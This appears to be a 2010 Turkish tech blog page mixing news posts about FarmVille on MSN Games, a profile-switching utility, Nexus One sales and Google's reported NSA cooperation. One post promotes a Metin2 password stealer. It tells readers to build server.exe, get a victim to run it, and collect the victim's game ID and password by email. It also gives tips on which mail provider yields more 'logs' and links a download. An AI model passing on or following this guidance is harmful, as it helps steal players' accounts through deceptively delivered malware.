6 Şubat 2010 Cumartesi

FarmVille MSN'e Geliyor

Facebook üzerinden oynana ve artık bir çılgınlık seviyesine ulaşan FarmVille'in yapımcısı Zynga, Microsoft ile anlaşma imzalayarak oyunu MSN Games'e getirdi.
Facebook'taki en popüler oyunlardan FarmVille ve CafeWorld'ün geliştiricisi Zynga, ayda 230 milyon kişiye ulaşan kullanıcı sayısıyla tüm dünyanın ilgisini çekiyor. Bunların arasında Microsoft da yer alıyor.
Zynga tarafından yapılan açıklamada, şirketin MSN Games ile ortaklık anlaşması imzaladığı belirtildi. Böylece kullanıclar MSN Games ve Windows Live Messenger üzerinden Facebook Connect özelliğini kullanarak FarmVille oynayabilecekler.
Farmville'in tüm dünyada 75 milyon kişi oynuyor
FarmVille ile kısıtlı değil
Yapılan anlaşmanın sonrasında Zynga'nın oyunlarını oynayanlar MSN Games'i kullanabilecekler, aynı zamanda diğer oyuncularla bağlantıya geçebilecekler.
Zynga, FarmVille ile başlayan bu anlaşmayı ilerde daha da ilerleteceğini belirtti. Yakın bir zaman içinde diğer Zynga oyunları da MSN Games ve Windows Live Messenger üzerinden oynanabilecek.
Zynga'nın geliştirdiği FarmVille'in dünya çapında yaklaşık 75 milyon oyuncusu var.

Metin 2 Oyunu Şifre Çalıcı [Stealer]



Metin 2 Oyunu Şifre Çalıcı [Stealer]

Metin2 Oyunu oynayanlar için bir stealer. Metin 2 de şifre çalmakmı istiyorsunuz. Kutuya mail adresinizi yazıyorsunuz Generuj Serwer! yazan butona tıklayarak server.exe yi oluşturun ve kurbana bir şekilde yedirin metin2 id ve şifresi size gelsin.

Metin2 Şifre Çalıcı [Stealer] konunun altındaki eklentiden İndirebilirsiniz.

Resimlerle Metin2 Şifre Kırıcı :

Buda ganimeti
Resimde gördüğünüz gibi birçok kişi den mail gelmeye başladı.
Aol maili kullanırsanız çok daha iyi log gelir.
Eğer aol mail kullanmayacaksanız yahoo maili tercih ediniz.




Metin2 Şifre ÇalıcıDOWNLAND

Bozulan Ayarlarınızı Tek Tıkla Düzenleyin

Bilgisayarınızda çeşitli kullanıcı profilleri oluşturarak yalnızca bir tık ile tüm kişisel ayarlarınızı geri döndürmek istiyorsanız bu ücretsiz yazılıma mutlaka göz atın.
Birden fazla kullanıcı hesabı açmadan aynı hesapta çeşitli profiller oluşturarak, ayarlarınızı içinde bulunduğunuz duruma göre değiştiren bir yazılım olan Quick Config, ücretsiz ve basit arayüzlü bir yazılım olarak dikkat çekiyor. Yarattığınız profiller ağ, sistem, masaüstü ayarlarınız ile internet tarayıcılarınız ve e-posta istemcileriniz üzerinde etkili olabiliyor.

Bilgisayarınızda çeşitli kullanıcı profilleri oluşturarak yalnızca bir tık ile tüm kişisel ayarlarınızı geri döndürmek istiyorsanız bu ücretsiz yazılıma mutlaka göz atın.

Profilleri Görüntüleyin
Yaptığınız her türlü ayar üzerinde kısayol atama imkanı ve yalnızca bir tık ile oldukça hızlı bir biçimde profil değiştirme olanağı yazılımın diğer özellikleri arasında. Kayıtlı tüm profillerinizi birer ikon olarak başlangıç sayfasında gösteren yazılım Internet Explorer, Firefox, Opera ve Google Chrome tarayıcıları ile tam uyumlu olarak kullanılabiliyor.

Bilgisayarınızda çeşitli kullanıcı profilleri oluşturarak yalnızca bir tık ile tüm kişisel ayarlarınızı geri döndürmek istiyorsanız bu ücretsiz yazılıma mutlaka göz atın.

Nexus One'ın Ocak Satışı Belli Oldu

Büyük hayalkırıklığı olarak nitelendirilen Nexus One, başarılarına(!) tam gaz devam ediyor.
Google'ın büyük umutlarla, HTC ile ortak çalışarak piyasaya sürdüğü Nexus One, satış oranları açısından hayal kırıklığı üzerine hayal kırıklığı yaşatmaya devam ediyor. Bugün yayınladığımız diğer haberde, bununla ilgili bazı detayları sizinle paylaşmıştık.

Piyasaya çıktığı ilk hafta sadece 20.000 adet satılan Nexus One, Ocak ayı içerisinde, tüm dünyada yalnızca 80.000 satış gerçekleştirebildi. Google, Nexus One'a desteğini kesmiş değil ancak, çok daha güçlü bir reklam kampanyasına ihtiyaç duyulduğu da yadsınamaz.
::Google, şapkadan tavşan çıkarıp Nexus One'ı diriltebilir mi?

Google'dan Tehlikeli Hamle

Google, sıklaşan siber saldırılar üzerine önlem almaya karar verdi. Peki işbirlikçisi kim oldu?
Google, köpekbalıklarının yüzdüğü tehlikeli sulara yol alıyor. Çin'de gerçekleşen siber saldırılardan sonra, Google, Amerikan Güvenlik Ajansı(NSA) ile tam kapsamlı işbirliği yapmaya karar verdi.

Amerikan'ın dev basın organlarından Washington Post, NSA'nın parlamenterleri bile dinleyecek kadar ileriye gittiğini iddia etmişti. Paranoyaklığıyla dikkat çeken NSA ile yapılacak olası işbirliği, Google'ı "Biri Bizi Gözetliyor" evine çevirip, imajını fazlasıyla zedeleyebilir.